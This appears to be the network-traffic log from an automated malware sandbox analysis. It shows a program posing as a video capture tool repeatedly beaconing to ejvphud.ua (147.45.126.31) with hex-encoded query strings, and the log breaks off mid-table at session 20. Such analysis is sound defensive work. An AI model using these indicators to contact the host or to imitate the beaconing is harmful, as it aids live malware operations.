GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Dec 16, 2024 14:53:08.409395933 CET | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:53:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49757 | Destination IP: 147.45.126.31 | Destination Port: 80 | PID: 7156
Process: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe

Timestamp: Dec 16, 2024 14:53:08.649835110 CET | Bytes transferred: 325 | Direction: OUT
GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Dec 16, 2024 14:53:10.043884039 CET | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:53:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Timestamp: Dec 16, 2024 14:53:10.154171944 CET | Bytes transferred: 325 | Direction: OUT
GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Dec 16, 2024 14:53:10.695456982 CET | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:53:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49765 | Destination IP: 147.45.126.31 | Destination Port: 80 | PID: 7156
Process: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe

Timestamp: Dec 16, 2024 14:53:10.930886030 CET | Bytes transferred: 325 | Direction: OUT
GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Dec 16, 2024 14:53:12.337655067 CET | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:53:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49768 | Destination IP: 147.45.126.31 | Destination Port: 80 | PID: 7156
Process: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe

Timestamp: Dec 16, 2024 14:53:12.572458029 CET | Bytes transferred: 325 | Direction: OUT
GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Dec 16, 2024 14:53:13.939490080 CET | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:53:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49774 | Destination IP: 147.45.126.31 | Destination Port: 80 | PID: 7156
Process: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe

Timestamp: Dec 16, 2024 14:53:14.181159019 CET | Bytes transferred: 325 | Direction: OUT
GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Dec 16, 2024 14:53:15.551892996 CET | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:53:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49778 | Destination IP: 147.45.126.31 | Destination Port: 80 | PID: 7156
Process: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe

Timestamp: Dec 16, 2024 14:53:15.790868044 CET | Bytes transferred: 325 | Direction: OUT
GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Dec 16, 2024 14:53:17.135580063 CET | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:53:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49781 | Destination IP: 147.45.126.31 | Destination Port: 80 | PID: 7156
Process: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe

Timestamp: Dec 16, 2024 14:53:17.468280077 CET | Bytes transferred: 325 | Direction: OUT
GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Dec 16, 2024 14:53:18.859541893 CET | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:53:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Timestamp: Dec 16, 2024 14:53:18.966852903 CET | Bytes transferred: 325 | Direction: OUT
GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Dec 16, 2024 14:53:19.478001118 CET | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:53:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49789 | Destination IP: 147.45.126.31 | Destination Port: 80 | PID: 7156
Process: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe

Timestamp: Dec 16, 2024 14:53:19.712526083 CET | Bytes transferred: 325 | Direction: OUT
GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Dec 16, 2024 14:53:21.246119022 CET | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:53:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Timestamp: Dec 16, 2024 14:53:21.357280970 CET | Bytes transferred: 325 | Direction: OUT
GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Dec 16, 2024 14:53:21.856231928 CET | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:53:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Timestamp: Dec 16, 2024 14:53:21.966519117 CET | Bytes transferred: 325 | Direction: OUT
GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Dec 16, 2024 14:53:22.496283054 CET | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:53:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Timestamp: Dec 16, 2024 14:53:22.614489079 CET | Bytes transferred: 325 | Direction: OUT
GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Dec 16, 2024 14:53:23.106645107 CET | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:53:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 10 | Source IP: 192.168.2.4 | Source Port: 49798 | Destination IP: 147.45.126.31 | Destination Port: 80 | PID: 7156
Process: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe

Timestamp: Dec 16, 2024 14:53:23.446971893 CET | Bytes transferred: 325 | Direction: OUT
GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Dec 16, 2024 14:53:25.812499046 CET | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:53:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 11 | Source IP: 192.168.2.4 | Source Port: 49803 | Destination IP: 147.45.126.31 | Destination Port: 80 | PID: 7156
Process: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe

Timestamp: Dec 16, 2024 14:53:26.322401047 CET | Bytes transferred: 325 | Direction: OUT
GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Dec 16, 2024 14:53:27.712352991 CET | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:53:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Timestamp: Dec 16, 2024 14:53:27.826060057 CET | Bytes transferred: 325 | Direction: OUT
GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Dec 16, 2024 14:53:28.326920033 CET | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:53:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 12 | Source IP: 192.168.2.4 | Source Port: 49811 | Destination IP: 147.45.126.31 | Destination Port: 80 | PID: 7156
Process: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe

Timestamp: Dec 16, 2024 14:53:28.688622952 CET | Bytes transferred: 325 | Direction: OUT
GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Dec 16, 2024 14:53:29.959032059 CET | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:53:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 13 | Source IP: 192.168.2.4 | Source Port: 49815 | Destination IP: 147.45.126.31 | Destination Port: 80 | PID: 7156
Process: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe

Timestamp: Dec 16, 2024 14:53:30.225482941 CET | Bytes transferred: 325 | Direction: OUT
GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Dec 16, 2024 14:53:31.620377064 CET | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:53:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 49821 | Destination IP: 147.45.126.31 | Destination Port: 80 | PID: 7156
Process: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe

Timestamp: Dec 16, 2024 14:53:31.975008965 CET | Bytes transferred: 325 | Direction: OUT
GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Dec 16, 2024 14:53:33.370970964 CET | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:53:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Timestamp: Dec 16, 2024 14:53:33.482516050 CET | Bytes transferred: 325 | Direction: OUT
GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Timestamp: Dec 16, 2024 14:53:34.117160082 CET | Bytes transferred: 220 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:53:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49827 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:53:34.408777952 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:53:35.744419098 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:53:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49833 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:53:35.977987051 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:53:37.333621025 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:53:37 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49837 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:53:37.608743906 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:53:38.973234892 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:53:38 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49840 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:53:39.212215900 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:53:40.596025944 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:53:40 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49846 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:53:40.838383913 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:53:42.202605009 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:53:41 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Dec 16, 2024 14:53:42.314868927 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:53:42.800298929 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:53:42 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49852 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
